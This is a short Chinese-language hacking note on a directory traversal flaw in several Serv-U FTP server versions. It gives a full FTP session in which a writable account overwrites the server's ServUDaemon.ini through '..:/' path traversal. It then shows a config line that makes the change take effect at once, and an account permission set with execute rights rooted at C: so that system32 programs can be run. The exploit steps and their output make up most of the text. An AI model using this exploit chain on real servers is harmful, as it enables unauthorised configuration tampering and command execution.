1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。

使用可写帐号登录（如果是匿名ftp，则只有读取权限）

C:\Documents and Settings\Administrator>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (127.0.0.1:(none)): admin
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd /
250 Directory changed to /
ftp> lcd c:\
Local directory now C:\.
ftp> put ServUDaemon.ini "..:/..:/..:/..:/Program Files/RhinoSoft.com/Serv-U/Ser
vUDaemon.ini"
200 PORT Command successful.
150 Opening ASCII mode data connection for ServUDaemon.ini.
226 Transfer complete.
ftp: 585 bytes sent in 0.00Seconds 585000.00Kbytes/sec.

注意：每次尽量通过cd /切换到当前跟目录，以便使用..:/..:/相对的时候不会出错。

2.对于重新配置servudaemon.ini后，立即生效问题，

可以在配置文件里面加入：

[GLOBAL]
Version=6.3.0.0
ReloadSettings=True

3.对于执行权限：

给予帐号RWAMELCDP权限，其中e是执行，p是继承，一般根目录为c：，以便可以对system32下面的exe直接调用。